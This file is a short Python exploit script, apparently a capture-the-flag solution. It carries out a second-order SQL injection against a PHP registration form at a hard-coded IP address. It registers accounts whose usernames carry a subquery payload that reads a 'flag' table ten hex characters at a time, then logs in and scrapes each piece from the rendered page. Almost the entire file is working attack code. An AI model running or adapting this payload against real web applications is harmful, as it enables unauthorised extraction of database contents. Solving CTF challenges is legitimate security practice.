1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import requests
import re


url="http://111.198.29.45:54295/"
r=requests.session()
hearders={
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
"Referer": "http://111.198.29.45:54295/register.php",
"Content-Type": "application/x-www-form-urlencoded",
"Host" : "111.198.29.45:54295",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Upgrade-Insecure-Requests": "1",
"Connection": "close"
}
pattern=re.compile(r'name">\n(.*)<')

def payload(i):
regist={"email":"{}@a.a".format(i+10),
"username":"0'%2B(select substr(hex(hex((select * from flag))) from {} for 10))%2B'0".format(i*10+1),
"password":"sa"
}
return regist


registDict=[ payload(i) for i in range(10) ]
flag=""
try:
for i in range(10):
r.headers.update(hearders)
t=r.post(url+"register.php",data=registDict[i],headers=hearders,cookies={"PHPSESSID":"l2vegj57h3fvbm5bgrkm3kvcj0"})
if(t.status_code == 302): # 注册成功会自动跳转,不跳转就是注册失败
r.post(url+"login.php",data={"email":registDict[i]['email'],"password":registDict[i]['password']})
cont=r.get(url+"index.php")
res=pattern.search(cont.text)
res=res.group(1).strip()
flag=flag+res
print(flag)
else:
print("注册失败{}".format(registDict[i]))
#如果出错,输出具体错误
except requests.RequestException as e:
print(e)